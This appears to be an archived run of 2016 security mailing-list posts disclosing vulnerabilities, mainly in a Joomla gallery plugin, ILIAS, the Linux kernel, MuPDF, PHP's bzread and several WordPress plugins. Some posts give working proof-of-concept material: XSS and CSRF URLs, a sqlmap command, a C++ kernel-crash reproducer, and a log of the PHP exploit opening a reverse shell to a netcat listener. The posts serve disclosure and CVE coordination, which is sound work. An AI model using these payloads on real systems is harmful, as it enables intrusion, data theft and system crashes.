Larry W. Cashdollar | 23 Jul 16:59 2016
Gravatar

XSS and SQLi in huge IT gallery v1.1.5 for Joomla

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, <at> _larry0 and Elitza Neytcheva, <at> ElitzaNeytcheva
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: info-ZoPKA+LiNDBBDgjK7y7TUQ@public.gmane.org
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62
64 $db->setQuery($query);
65 $results = $db->loadObjectList();
66 return $results;
67 }



XSS is here:

root <at> Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root <at> Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >
CVE-2016-1000113 2016-1000114
JSON: Export
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=164
Walter | 23 Jul 16:36 2016
Picon
Gravatar

XSS vulnerability in ILIAS before version 5.1.3, 5.0.11 and 4.4.14

A cross-site scripting vulnerability in ILIAS <http://www.ilias.de>
(Integrated Learning, Information and Work Cooperation System) version
5.1.2 has been found by Quadas.

Impact:

    This remotely accessible vulnerability is always reproducible and
    possibly works in any version before 5.1.3, 5.0.11 and 4.4.14.
    An attacker can supply java script code in the filename of an
    uploaded file, which will be executed in browsers of other users. It
    is not
    required to open this file. Browsing into the folder will trigger
    the code execution.

Exploit:

  * log in
  * open a folder you can upload a file to
  * select the "upload files"-dialog
  * drop a random file in
  * write code (e.g. JavaScript) in the filename
  * upload file

    From this moment the code will run on any user's web browser who
    opens the folder you uploaded the file in.

Patch:

    Vulnerability was fixed with version 5.1.3, 5.0.11 and 4.4.14.
    Ticket-ID was 0017977 but unfortunately the ticket was set on
    private view status. Link to the ticket
    <http://www.ilias.de/mantis/view.php?id=17977> (account is required)
    Surprisingly there are no commits on GitHub
    <https://github.com/ILIAS-eLearning/ILIAS>.

Can a CVE-ID be assigned please?
zer0mem | 22 Jul 16:54 2016
Picon
Gravatar

panic at big_key_preparse #4.7-r6/rc7 & master

Hi,

Following code will panic 4.7-rc6/rc7 & master

However will not panic at latest stable 4.6.4 kernel apparently

qemu + kasan

“””

/*

author :  <at> zer0mem

Qilin : v3.2 [ linux ]
Reproducer : v1.0

KASAN : active
KTSAN : non-active

Linux Kernel version : 4.7

compile : clang++-3.8 -std=c++1y poc.cpp -lpthread -o big_key_poc

issue : add_key -> "big_key"

[94011.624218] kasan: CONFIG_KASAN_INLINE enabled
[94011.624507] kasan: GPF could be caused by NULL-ptr deref or user memory access
[94011.624930] general protection fault: 0000 [#1] SMP KASAN
[94011.625234] Modules linked in:
[94011.625421] CPU: 0 PID: 13245 Comm: a.out Tainted: G    B           4.7.0-rc6+ #9
[94011.625837] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[94011.626363] task: ffff880013b1d580 ti: ffff8800693d8000 task.ti: ffff8800693d8000
[94011.626778] RIP: 0010:[<ffffffff819e6e64>]  [<ffffffff819e6e64>] big_key_preparse+0x1a4/0x540
[94011.627262] RSP: 0018:ffff8800693dfc90  EFLAGS: 00010206
[94011.627559] RAX: dffffc0000000000 RBX: ffff8800693dfdc8 RCX: 0000000000000000
[94011.627956] RDX: 0000000000000009 RSI: 0000000000000000 RDI: 0000000000000048
[94011.628356] RBP: ffff8800693dfcc8 R08: ffffed000d27bfc2 R09: ffff8800693dfdc8
[94011.628752] R10: ffff8800693dfe0f R11: ffffed000d27bfc2 R12: 0000000000000000
[94011.629149] R13: 0000000000000f50 R14: ffff8800693dfe48 R15: ffff8800693dfdf0
[94011.629547] FS:  00007faf577fe700(0000) GS:ffff88006d200000(0000) knlGS:0000000000000000
[94011.629994] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[94011.630361] CR2: 0000000000609000 CR3: 000000006a9bd000 CR4: 00000000000006f0
[94011.630812] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[94011.631223] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[94011.631633] Stack:
[94011.631755]  ffff8800693dfdc8 0000000000000048 ffffffff819e6cc0 1ffff1000d27bfa5
[94011.632349]  ffffffffffffffec ffff8800693dfe48 ffff88005098b400 ffff8800693dfe70
[94011.633063]  ffffffff819d5a81 0000000000000004 ffff8800693dfd30 ffff8800693dfdc8
[94011.633550] Call Trace:
[94011.633702]  [<ffffffff819e6cc0>] ? big_key_crypt+0x2a0/0x2a0
[94011.634034]  [<ffffffff819d5a81>] key_create_or_update+0x361/0xa00
[94011.634389]  [<ffffffff819d5720>] ? key_type_lookup+0xe0/0xe0
[94011.634719]  [<ffffffff815c3609>] ? ___slab_alloc+0x179/0x4c0
[94011.635050]  [<ffffffff815c5643>] ? __kmalloc+0x103/0x250
[94011.635360]  [<ffffffff819da6e4>] SyS_add_key+0x1f4/0x390
[94011.635671]  [<ffffffff819da4f0>] ? key_get_type_from_user.constprop.8+0xe0/0xe0
[94011.636106]  [<ffffffff81083d40>] ? compat_start_thread+0x90/0x90
[94011.636457]  [<ffffffff82d36af6>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[94011.636823] Code: 5c 41 5d 41 5e 41 5f 5d c3 e8 89 f1 98 ff 4c 8b 25 32 cb 47 02 48 b8 00 00 00 00 00 fc ff df 49 8d 7c 24
48 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 78 03 00 00 4d 8b 64 24 48 48 b8 00 00 00 00 
[94011.638412] RIP  [<ffffffff819e6e64>] big_key_preparse+0x1a4/0x540
[94011.638775]  RSP <ffff8800693dfc90>
[94011.639205] ---[ end trace 0255e2496c208fbf ]---
[94011.639474] Kernel panic - not syncing: Fatal exception
[94011.639855] Kernel Offset: disabled
[94011.640066] ---[ end Kernel panic - not syncing: Fatal exception

*/

#include <stdint.h>

#include <memory>
#include <algorithm>
#include <functional>
#include <string>
#include <atomic>
#include <stdlib.h>
#include <vector>
#include <stdlib.h>
#include <stdio.h>

#include <thread>

#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <fcntl.h>

#include <keyutils.h>

int handles[0x10] = { 0 };
char buffer[0x1000] = { 0 };

bool rand01() { return std::rand() % 2; }

void shaka()
{
	for (size_t i = 0; i < sizeof(buffer); ++i)
		buffer[i] = std::rand() % 0xFF;

	while (true)
	{
		for (size_t i = std::rand() % sizeof(buffer); i < sizeof(buffer); ++i)
			buffer[i] = std::rand() % 0xFF;

		sleep(std::rand() % 10);
	}
}

void workers(int fd)
{
	size_t max_round = 40 + std::rand() % 200;
	for (size_t i = 0; i < max_round; i++)
	{
		switch(std::rand() % 1)
		{
			case 0 :
			{
				add_key(
					rand01() ? "user" : "big_key",
					0,
					buffer,
					std::rand() % sizeof(buffer),
					handles[std::rand() % 0x10]);

			} break;

			default:
				break;
		}		
	}
}

void ctors(int ind)
{
	handles[ind] = 0;
	while (!handles[ind])
	{
		switch(std::rand() % 1)
		{
			case 0 :
			{
				handles[ind] = add_key(
					rand01() ? "user" : "big_key",
					0,
					buffer,
					std::rand() % sizeof(buffer),
					handles[std::rand() % 0x10]);
			} break;

			default:
				break;
		}
	}
	int fd = handles[ind];
	for (size_t i = 0; i < 20; ++i, sleep(1 + std::rand() % 4))
		for (size_t j = std::rand() % 4; j; --j)
			workers(fd);
}

int main()
{
	std::thread(shaka).detach();
	for (;; sleep(std::rand() % 4))
		std::thread([]()
			{
			for (size_t i = 0; i < 0x10; ++i)
				std::thread(ctors, i).detach();		
			}).detach();
	
	return 0;
};

#include <asm/unistd.h>

#define __weak __attribute__((weak))

key_serial_t __weak add_key(const char *type,
			    const char *description,
			    const void *payload,
			    size_t plen,
			    key_serial_t ringid)
{
	return syscall(__NR_add_key,
		       type, description, payload, plen, ringid);
}

“””

Peter

Sent from Mail for Windows 10

Marco Grassi | 21 Jul 15:42 2016
Picon
Gravatar

mupdf library use after free

Hi,

I disclosed a UAF in MuPDF, you can find the reproducer and report here:

http://bugs.ghostscript.com/show_bug.cgi?id=696941

I put a partially symbolicated ASAN report here for reference

Marco

-----

➜  mupdf ./mupdf_debug/build/debug/mupdf-x11 mucrash1.pdf 2>&1 |
asan_symbolize-3.8
warning: broken xref section, proceeding anyway.
=================================================================
==24575==ERROR: AddressSanitizer: heap-use-after-free on address
0x61700000fda8 at pc 0x0000006b0a54 bp 0x7ffcb040dbb0 sp 0x7ffcb040dba8
READ of size 4 at 0x61700000fda8 thread T0
    #0 0x6b0a53 in pdf_load_xref
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/pdf/pdf-xref.c:1188
    #1 0x6b0a53 in ?? ??:0
    #2 0x6aac73 in pdf_init_document
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/pdf/pdf-xref.c:1440
    #3 0x6aac73 in ?? ??:0
    #4 0x6ad4ae in pdf_open_document
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/pdf/pdf-xref.c:2347
    #5 0x6ad4ae in ?? ??:0
    #6 0x5183d2 in fz_open_document
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/fitz/document.c:129
    #7 0x5183d2 in ?? ??:0
    #8 0x4fbb2b in pdfapp_open_progressive
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/platform/x11/pdfapp.c:317
    #9 0x4fbb2b in ?? ??:0
    #10 0x4fb708 in pdfapp_open
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/platform/x11/pdfapp.c:213
    #11 0x4fb708 in ?? ??:0
    #12 0x4f01df in main
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/platform/x11/x11_main.c:888
    #13 0x4f01df in ?? ??:0
    #14 0x7f6b723ef82f in __libc_start_main
/build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #15 0x7f6b723ef82f in ?? ??:0
    #16 0x41ad98 in _start ??:?
    #17 0x41ad98 in ?? ??:0

0x61700000fda8 is located 296 bytes inside of 768-byte region
[0x61700000fc80,0x61700000ff80)
freed by thread T0 here:
    #0 0x4bad40 in __interceptor_cfree.localalias.0 asan_malloc_linux.cc.o:?
    #1 0x4bad40 in ?? ??:0
    #2 0x516018 in fz_free_default
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/fitz/memory.c:225
    #3 0x516018 in ?? ??:0

previously allocated by thread T0 here:
    #0 0x4baec8 in malloc ??:?
    #1 0x4baec8 in ?? ??:0
    #2 0x515f68 in fz_malloc_default
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/fitz/memory.c:213
    #3 0x515f68 in ?? ??:0
    #4 0x6b9aae in pdf_xref_find_subsection
/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/source/pdf/pdf-xref.c:740
    #5 0x6b9aae in ?? ??:0

SUMMARY: AddressSanitizer: heap-use-after-free
(/media/bob/e4109b52-3574-43a8-b95d-33b3494128de/misc/mupdf/mupdf_debug/build/debug/mupdf-x11+0x6b0a53)
Shadow bytes around the buggy address:
  0x0c2e7fff9f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e7fff9f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e7fff9f90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e7fff9fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2e7fff9fb0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c2e7fff9fc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e7fff9fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e7fff9fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e7fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24575==ABORTING
Christian Wressnegger | 21 Jul 08:49 2016
Picon
Picon

Re: Buffer overflow in libarchive-3.2.0

On 07/20/2016 03:54 PM, cve-assign@... wrote:
>> https://github.com/libarchive/libarchive/commit/3014e19820ea53c15c90f9d447ca3e668a0b76c6
> 
> Use CVE-2016-6250 for everything fixed by this commit.

Thank you!

Hans Jerry Illikainen | 21 Jul 05:39 2016

CVE-2016-5399: php: out-of-bounds write in bzread()

PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in
its `bzread()' function:

php-7.0.8/ext/bz2/bz2.c
,----
| 364 static PHP_FUNCTION(bzread)
| 365 {
| ...
| 382     ZSTR_LEN(data) = php_stream_read(stream, ZSTR_VAL(data), ZSTR_LEN(data));
| 383     ZSTR_VAL(data)[ZSTR_LEN(data)] = '\0';
| 384
| 385     RETURN_NEW_STR(data);
| 386 }
`----

php-7.0.8/ext/bz2/bz2.c
,----
| 210 php_stream_ops php_stream_bz2io_ops = {
| 211     php_bz2iop_write, php_bz2iop_read,
| 212     php_bz2iop_close, php_bz2iop_flush,
| 213     "BZip2",
| 214     NULL, /* seek */
| 215     NULL, /* cast */
| 216     NULL, /* stat */
| 217     NULL  /* set_option */
| 218 };
`----

php-7.0.8/ext/bz2/bz2.c
,----
| 136 /* {{{ BZip2 stream implementation */
| 137
| 138 static size_t php_bz2iop_read(php_stream *stream, char *buf, size_t count)
| 139 {
| 140     struct php_bz2_stream_data_t *self = (struct php_bz2_stream_data_t *)stream->abstract;
| 141     size_t ret = 0;
| 142
| 143     do {
| 144         int just_read;
| ...
| 148         just_read = BZ2_bzread(self->bz_file, buf, to_read);
| 149
| 150         if (just_read < 1) {
| 151             stream->eof = 0 == just_read;
| 152             break;
| 153         }
| 154
| 155         ret += just_read;
| 156     } while (ret < count);
| 157
| 158     return ret;
| 159 }
`----

The erroneous return values for Bzip2 are as follows:

bzip2-1.0.6/bzlib.h
,----
| 038 #define BZ_SEQUENCE_ERROR    (-1)
| 039 #define BZ_PARAM_ERROR       (-2)
| 040 #define BZ_MEM_ERROR         (-3)
| 041 #define BZ_DATA_ERROR        (-4)
| 042 #define BZ_DATA_ERROR_MAGIC  (-5)
| 043 #define BZ_IO_ERROR          (-6)
| 044 #define BZ_UNEXPECTED_EOF    (-7)
| 045 #define BZ_OUTBUFF_FULL      (-8)
| 046 #define BZ_CONFIG_ERROR      (-9)
`----

Should the invocation of BZ2_bzread() fail, the loop would simply be
broken out of (bz2.c:152) and execution would continue with bzread()
returning RETURN_NEW_STR(data).

According to the manual [1], bzread() returns FALSE on error; however
that does not seem to ever happen.

Due to the way that the bzip2 library deals with state, this could
result in an exploitable condition if a user were to call bzread() after
an error, eg:

,----
| $data = "";
| while (!feof($fp)) {
|     $res = bzread($fp);
|     if ($res === FALSE) {
|         exit("ERROR: bzread()");
|     }
|     $data .= $res;
| }
`----

Exploitation
============

One way the lack of error-checking could be abused is through
out-of-bound writes that may occur when `BZ2_decompress()' (BZ2_bzread()
-> BZ2_bzRead() -> BZ2_bzDecompress() -> BZ2_decompress()) processes the
`pos' array using user-controlled selectors as indices:

bzip2-1.0.6/decompress.c
,----
| 106 Int32 BZ2_decompress ( DState* s )
| 107 {
| 108    UChar      uc;
| 109    Int32      retVal;
| ...
| 113    /* stuff that needs to be saved/restored */
| 114    Int32  i;
| 115    Int32  j;
| ...
| 118    Int32  nGroups;
| 119    Int32  nSelectors;
| ...
| 167    /*restore from the save area*/
| 168    i           = s->save_i;
| 169    j           = s->save_j;
| ...
| 172    nGroups     = s->save_nGroups;
| 173    nSelectors  = s->save_nSelectors;
| ...
| 195    switch (s->state) {
| ...
| 286       /*--- Now the selectors ---*/
| 287       GET_BITS(BZ_X_SELECTOR_1, nGroups, 3);
| 288       if (nGroups < 2 || nGroups > 6) RETURN(BZ_DATA_ERROR);
| 289       GET_BITS(BZ_X_SELECTOR_2, nSelectors, 15);
| 290       if (nSelectors < 1) RETURN(BZ_DATA_ERROR);
| 291       for (i = 0; i < nSelectors; i++) {
| 292          j = 0;
| 293          while (True) {
| 294             GET_BIT(BZ_X_SELECTOR_3, uc);
| 295             if (uc == 0) break;
| 296             j++;
| 297             if (j >= nGroups) RETURN(BZ_DATA_ERROR);
| 298          }
| 299          s->selectorMtf[i] = j;
| 300       }
| 301
| 302       /*--- Undo the MTF values for the selectors. ---*/
| 303       {
| 304          UChar pos[BZ_N_GROUPS], tmp, v;
| 305          for (v = 0; v < nGroups; v++) pos[v] = v;
| 306
| 307          for (i = 0; i < nSelectors; i++) {
| 308             v = s->selectorMtf[i];
| 309             tmp = pos[v];
| 310             while (v > 0) { pos[v] = pos[v-1]; v--; }
| 311             pos[0] = tmp;
| 312             s->selector[i] = tmp;
| 313          }
| 314       }
| 315
| ...
| 613    save_state_and_return:
| 614
| 615    s->save_i           = i;
| 616    s->save_j           = j;
| ...
| 619    s->save_nGroups     = nGroups;
| 620    s->save_nSelectors  = nSelectors;
| ...
| 640    return retVal;
| 641 }
`----

bzip2-1.0.6/decompress.c
,----
| 070 #define GET_BIT(lll,uuu)                          \
| 071    GET_BITS(lll,uuu,1)
`----

bzip2-1.0.6/decompress.c
,----
| 043 #define GET_BITS(lll,vvv,nnn)                     \
| 044    case lll: s->state = lll;                      \
| 045    while (True) {                                 \
| ...
| 065    }
`----

If j >= nGroups (decompress.c:297), BZ2_decompress() would save its
state and return BZ_DATA_ERROR.  If the caller don't act on the
erroneous retval, but rather invokes BZ2_decompress() again, the saved
state would be restored (including `i' and `j') and the switch statement
would transfer execution to the BZ_X_SELECTOR_3 case -- ie. the
preceding initialization of `i = 0' and `j = 0' would not be executed.

In pseudocode it could be read as something like:

,----
| i = s->save_i;
| j = s->save_j;
| 
| switch (s->state) {
| case BZ_X_SELECTOR_2:
|     s->state = BZ_X_SELECTOR_2;
| 
|     nSelectors = get_15_bits...
| 
|     for (i = 0; i < nSelectors; i++) {
|         j = 0;
|         while (True) {
|             goto iter;
| case BZ_X_SELECTOR_3:
| iter:
|     s->state = BZ_X_SELECTOR_3;
| 
|     uc = get_1_bit...
| 
|     if (uc == 0) goto done;
|     j++;
|     if (j >= nGroups) {
|         retVal = BZ_DATA_ERROR;
|         goto save_state_and_return;
|     }
|     goto iter;
| done:
|     s->selectorMtf[i] = j;
`----

An example selector with nGroup=6:
,----
| 11111111111110
| ||||| `|||||| `- goto done; s->selectorMtf[i] = 13;
|  `´     j++;
| j++;    goto save_state_and_return;
| goto iter;
`----

Since the selectors are used as indices to `pos' in the subsequent loop,
an `nSelectors' amount of <= 255 - BZ_N_GROUPS bytes out-of-bound writes
could occur if BZ2_decompress() is invoked in spite of a previous error.

bzip2-1.0.6/decompress.c
,----
| 304          UChar pos[BZ_N_GROUPS], tmp, v;
| 305          for (v = 0; v < nGroups; v++) pos[v] = v;
| 306
| 307          for (i = 0; i < nSelectors; i++) {
| 308             v = s->selectorMtf[i];
| 309             tmp = pos[v];
| 310             while (v > 0) { pos[v] = pos[v-1]; v--; }
| 311             pos[0] = tmp;
| 312             s->selector[i] = tmp;
| 313          }
`----

bzip2-1.0.6/bzlib_private.h
,----
| 121 #define BZ_N_GROUPS 6
`----

PoC
===

Against FreeBSD 10.3 amd64 with php-fpm 7.0.8 and nginx from the
official repo [2]:

,----
| $ nc -v -l 1.2.3.4 5555 &
| Listening on [1.2.3.4] (family 0, port 5555)
| 
| $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
| [*] sending archive to http://target/upload.php (0)
| 
| Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
| $ fg
| id
| uid=80(www) gid=80(www) groups=80(www)
| 
| uname -imrsU
| FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000
| 
| /usr/sbin/pkg query -g "=> %n-%v" php*
| => php70-7.0.8
| => php70-bz2-7.0.8
| 
| cat upload.php
| <?php
| $fp = bzopen($_FILES["file"]["tmp_name"], "r");
| if ($fp === FALSE) {
|     exit("ERROR: bzopen()");
| }
| 
| $data = "";
| while (!feof($fp)) {
|     $res = bzread($fp);
|     if ($res === FALSE) {
|         exit("ERROR: bzread()");
|     }
|     $data .= $res;
| }
| bzclose($fp);
| ?>
`----

Solution
========

This issue has been assigned CVE-2016-5399 and can be mitigated by
calling bzerror() on the handle between invocations of bzip2.

Another partial solution has been introduced in PHP 7.0.9 and 5.5.38,
whereby the stream is marked as EOF when an error is encountered;
allowing this flaw to be avoided by using feof().  However, the PHP
project considers this to be an issue in the underlying bzip2
library[3].

Footnotes
_________

[1] [https://secure.php.net/manual/en/function.bzread.php]

[2] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-5399]

[3] [https://bugs.php.net/bug.php?id=72613]

--

-- 
Hans Jerry Illikainen

Andreas Stieger | 20 Jul 22:37 2016

CVE request: multiple issues fixed in GNU libidn 1.33

Hello,

The GNU libidn 1.33 release was announced with the following:

https://lists.gnu.org/archive/html/help-libidn/2016-07/msg00009.html

> ** libidn: Fix out-of-bounds stack read in idna_to_ascii_4i.
> See tests/tst_toascii64oob.c for regression check (and the comment in
> it how to use it).  Reported by Hanno Böck <address <at> hidden>.

Test:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=9a1a7e15d0706634971364493fbb06e77e74726c
Fix:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=f20ce1128fb7f4d33297eee307dddaf0f92ac72d
Changelog:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=d4c533a5d975bf49090d3cd40acd230b8f79dd32
Follow-up memory leak fix:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=11abd0e02c16f9e0b6944aea4ef0f2df44b42dd4

> ** idn: Solve out-of-bounds-read when reading one zero byte as input.
> Also replaced fgets with getline.  Reported by Hanno Böck <address <at> hidden>.

Fix:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=570e68886c41c2e765e6218cb317d9a9a447a041
Follow-up fix:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=5e3cb9c7b5bf0ce665b9d68f5ddf095af5c9ba60

> ** libidn: stringprep_utf8_nfkc_normalize reject invalid UTF-8.
> It was always documented to only accept UTF-8 data, but now it doesn't
> crash when presented with such data.  Reported by Hanno Böck.

Test / Fix:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=1fbee57ef3c72db2206dd87e4162108b2f425555
Changelog:
http://git.savannah.gnu.org/cgit/libidn.git/commit/?id=1d2413555dcd1fef26b80445a00a4637965a2df0

Could CVEs please be assigned?

Thanks,
Andreas

--

-- 
Andreas Stieger <andreas.stieger@...>
Project Manager Security
SUSE Linux GmbH, GF: Felix Imendörffer, Jane Smithard, Graham Norton,
HRB 21284 (AG Nürnberg)

Summer of Pwnage | 20 Jul 18:26 2016
Picon

Multiple vulnerabilities affecting five WordPress Plugins (XSS, CSRF & SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Cross-Site Request Forgery in Icegram WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Icegram
WordPress Plugin. This issue allows an attacker to overwrite any
WordPress option with the value true. An attacker may use this issue to
enable (vulnerable) WordPress features that are disabled in the target
site.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0032

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Icegram - Popups, Optins, CTAs
& lot more... [2] WordPress Plugin version 1.9.18.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Icegram 1.9.19 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Icegram  [2] WordPress Plugin allows creating beautiful popups,
hellobars, slide-ins & notifications. Capture leads, Instant results and
awesome support. A Cross-Site Reqeust Forgery vulnerability exists in
Icegram that allows an attacker to overwrite any WordPress option with
the value true. An attacker may use this issue to enable (vulnerable)
WordPress features that are disabled in the target site.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file icegram.php. As can be seen in the
code fragment below, the plugin reads the value of the option_name URL
parameter and uses this value as a key to update_option(). This allows
an attacker to create an link that will overwrite an arbitrary WordPress
option. The value of target option will be set to true.

update_option($_GET['option_name'], true);

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious link. If a logged in
Administrator opens the following URL, the ability for users to register
will be enabled:

http://<target>/wp-admin/edit.php?dismiss_admin_notice=1&option_name=users_can_register
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_icegram_wordpress_plugin.html

[2] https://wordpress.org/plugins/icegram/

[3] https://downloads.wordpress.org/plugin/icegram.1.9.19.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Paid Memberships Pro WordPress
Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Paid Memberships
Pro WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0015

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Paid Memberships Pro [2] WordPress
Plugin version 1.8.9.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in commit d39a18b [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request

"plugin_status" field does not validate <script> tags and does not
perform output encoding.

paid-memberships-pro/adminpages/addons.php
72: echo echo
admin_url("admin.php?page=pmpro-addons&force-check=1&plugin_status=" .
$status); 
33: $status = $_REQUEST['plugin_status']; 

An attacker needs to lure a logged-in admin to follow the link in the
proof of concept below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<targetsite>/wp-admin/admin.php?page=pmpro-addons&plugin_status=foofoo%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Ca
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_paid_memberships_pro_wordpress_plugin.html

[2] https://wordpress.org/plugins/paid-memberships-pro/

[3]
